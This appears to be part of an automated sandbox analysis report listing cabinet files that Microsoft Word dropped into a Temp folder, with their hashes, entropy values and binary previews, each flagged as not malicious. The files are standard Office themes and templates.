                                                Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..

                                                C:\Users\user\AppData\Local\Temp\cabF0CE.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):19893
                                                Entropy (8bit):7.592090622603185
                                                Encrypted:false
                                                SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                                MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                                SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                                SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                                SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                                Malicious:false
                                                Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1

                                                C:\Users\user\AppData\Local\Temp\cabF0CF.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):21357
                                                Entropy (8bit):7.641082043198371
                                                Encrypted:false
                                                SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                                MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                                SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                                SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                                SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                                Malicious:false
                                                Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.

                                                C:\Users\user\AppData\Local\Temp\cabF0D0.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):21875
                                                Entropy (8bit):7.6559132103953305
                                                Encrypted:false
                                                SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                                MD5:E532038762503FFA1371DF03FA2E222D
                                                SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                                SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                                SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                                Malicious:false
                                                Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)

                                                C:\Users\user\AppData\Local\Temp\cabF0D1.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):19288
                                                Entropy (8bit):7.570850633867256
                                                Encrypted:false
                                                SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                                MD5:B9A6FF715719EE9DE16421AB983CA745
                                                SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                                SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                                SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                                Malicious:false
                                                Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f

                                                C:\Users\user\AppData\Local\Temp\cabF0F4.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):22340
                                                Entropy (8bit):7.668619892503165
                                                Encrypted:false
                                                SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                                MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                                SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                                SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                                SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                                Malicious:false
                                                Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........

                                                C:\Users\user\AppData\Local\Temp\cabF149.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):43653
                                                Entropy (8bit):7.899157106666598
                                                Encrypted:false
                                                SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                                MD5:DA3380458170E60CBEA72602FDD0D955
                                                SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                                SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                                SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                                Malicious:false
                                                Preview:MSCF....uk......L...........................uk...?...................j......r...............Equations.dotx.................Content.inf.94v..R..[..... .............v........." Vw.w..r.....D.V5.p...W......b;....\x.....f.-...............l.....L.F..*..@..BnF.I.....%1..0....&.X.......X-.\.\.>..A....@..:...N .G./.Sp.A0.0.`.....q....b... ......S.{K...V....J............>\....\.E.#.,$.hxu.F.Fo....<...{..6../..#..l>d...w...&...S.....L.].....^..L......;~l.......qw.o. .....v.u.W`.4Z.A.....dC..Q)9.c..qgtfJ..G.(.J....q4V.).mK4;..zY..b.5&....V...0X.].Z..U.Lx..^..:8XQh.....7yy.._5............c.W...c...xY..%..G.$....kg^.1g.9.....z^.'...q."..K)a[.pW .LS.:Q8.....2..._q.os....y...d11.*.m....8.,.^.4_?i.e.u.,....._y.....zZZA.D.D<..+....{....Sfnv...t.....0...vV..y.r..3..%.<.t......;.h.wh.-.g.>..5...R...........y..]^..R..<...>$~.'...kk.n..H.EN.eQ.Q.O./='....)t.l0,/].....FNN......?...&..'.eS....K.K.v".^L..x=.^......1x|....=}@...B.kq;_a..C.q?..Y9.v......Q..u.G..V.

                                                C:\Users\user\AppData\Local\Temp\cabF169.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):307348
                                                Entropy (8bit):7.996451393909308
                                                Encrypted:true
                                                SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                                                MD5:0EBC45AA0E67CC435D0745438371F948
                                                SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                                SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                                SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                                Malicious:false
                                                Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...

                                                C:\Users\user\AppData\Local\Temp\cabF19C.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):42788
                                                Entropy (8bit):7.89307894056
                                                Encrypted:false
                                                SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                                MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                                SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                                SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                                SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                                Malicious:false
                                                Preview:MSCF.....h......L............................h...?..................@g......o...............Element design set.dotx.................Content.inf.Y/..Re..[......f........,..]....D.],....]..X.......XC4pE.....p........2..u;L.N.....]G..d.^d.$).e.=..;..Kb.../.../....H.."...w$._I..5.....a..4.Gd5p......v.8..1..%H..\..e...3.e..A..).d*.. . (.8.".......(>..<...@...~*v&.f..LWhqk]+Uep.d..%...o.....k.......e...nNN.&_.>.d.?H`"...r?..Z.p..q..<M.N.t....{*.y]#...._XW"qI...x.......}.. .N...;.}:..m8...[.r.F....^?...o...u..*...J3.V....~...~tn#.Kf6.s.|*..,s...M.$.f..?Yu.pE.1_wU...%....._..'..Z......y:.{.J5..7..Q.w}/.~.-3~Ctw=..IT.....mI.u@...y.M....2.%...y...Y..j.k<-.Q.r...7m..b...+.6..|.....U..}[...,....^....5..D..qW...[3).p.Y<.Hh..t...%cw=Z..W.~W.F....zr.4.g...O...P.g_^..3.-............3s...S..y...u...N...EsJz....tT../..c[w{cG....../6.....:.W<d5}.q..s..K"$........Ne..5..#.v'..n4.rj....Fc=....5..VN.....6..9`....|..........WX..-?..........W.)^`1.......].R2..s6...H.......

                                                C:\Users\user\AppData\Local\Temp\cabF210.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):276650
                                                Entropy (8bit):7.995561338730199
                                                Encrypted:true
                                                SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                                MD5:84D8F3848E7424CBE3801F9570E05018
                                                SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                                SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                                SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                                Malicious:false
                                                Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....

                                                C:\Users\user\AppData\Local\Temp\cabF244.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):295527
                                                Entropy (8bit):7.996203550147553
                                                Encrypted:true
                                                SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                                MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                                SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                                SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                                SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                                Malicious:false
                                                Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p

                                                C:\Users\user\AppData\Local\Temp\cabF246.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):271273
                                                Entropy (8bit):7.995547668305345
                                                Encrypted:true
                                                SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                                MD5:21437897C9B88AC2CB2BB2FEF922D191
                                                SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                                SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                                SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                                Malicious:false
                                                Preview:MSCF....Q.......D...............y...........Q...XJ..........{..................M.. .content.inf.(..........M.. .Frame.thmx.1....b..[.........B.....6....ZZ}....BH..-D..}..V.V-........Z..O.....H.f..........;..@d.`......!..=;.,bp..K.q....s.y....D.qZ)p......D...r.S....s=B.4.).8B....4.a6 ...~........."....#.....}....n.Q.1cH.%c/.U....E..E...!..Da*.p....X..G..:.....1.@.....W.'...._........W.c...<.v.k.....&.8......?.h.>d._:-.X.......9..tL}........3.;.N3.D~......>.^?..|:...}......oT.z.......w..[..}:...._fu........Kk.......L..9..p..e..^......K.%...Mapqhvv..E&.^.....[...9|"l...9...U......!..w..Nya...~C.yx...w.K..q.z.j.W?t.......DY.x.S2.....]..na.Qj...X.K..^...S.hK.W...Z....s.0...NF...8C.......j.'Zc...k.%...l....S.....OW..o.Qf.x...X.;<.rO].....W.m.e....T.1.6........".....Q.3........l..v.."..I...&......w..4vE...c.s[.3.m..8.q$.....a...)...&:6..,..#..?....;.!.....~.UP.r=.}h.&U......X...]..X.e\u.G<....E....lG.@.*Z...10.D@.]....z+-.S....p..Y.PK.:.S..p.....1E`..-

                                                C:\Users\user\AppData\Local\Temp\cabF288.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):723359
                                                Entropy (8bit):7.997550445816903
                                                Encrypted:true
                                                SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                                MD5:748A53C6BDD5CE97BD54A76C7A334286
                                                SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                                SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                                SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                                Malicious:false
                                                Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-

                                                C:\Users\user\AppData\Local\Temp\cabF289.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                                Category:dropped
                                                Size (bytes):261258
                                                Entropy (8bit):7.99541965268665
                                                Encrypted:true
                                                SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                                MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                                SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                                SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                                SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                                Malicious:false
